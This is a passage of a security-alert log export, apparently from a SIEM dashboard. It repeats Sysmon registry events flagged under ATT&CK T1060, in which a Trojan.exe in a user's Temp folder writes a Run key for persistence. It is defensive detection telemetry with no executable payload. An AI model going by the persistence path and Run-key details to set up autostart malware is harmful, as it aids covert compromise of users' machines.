HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:26.046"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:38.914",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:24.943 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:25.080968800Z"",""eventRecordID"":""1225"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:24.943\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:24.943"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:37.000",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:23.863 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:23.894557500Z"",""eventRecordID"":""1223"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:23.863\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:23.863"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:34.974",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:22.746 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:22.758621800Z"",""eventRecordID"":""1220"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:22.746\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:22.746"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:34.932",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:21.733 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:21.793528500Z"",""eventRecordID"":""1219"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:21.733\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:21.733"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:33.905",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:20.665 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:20.736098100Z"",""eventRecordID"":""1217"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:20.665\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:20.665"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:32.915",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:19.540 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:19.726531800Z"",""eventRecordID"":""1215"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:19.540\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:19.540"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:30.604",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:18.399 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:18.402764800Z"",""eventRecordID"":""1214"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:18.399\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:18.399"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:29.700",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:17.352 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:17.364882600Z"",""eventRecordID"":""1212"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:17.352\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:17.352"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:29.680",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:16.336 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:16.357836100Z"",""eventRecordID"":""1211"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:16.336\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:16.336"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:29.634",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:15.306 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:15.307725900Z"",""eventRecordID"":""1210"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:15.306\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:15.306"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:26.431",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:14.290 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:14.291591900Z"",""eventRecordID"":""1209"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:14.290\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
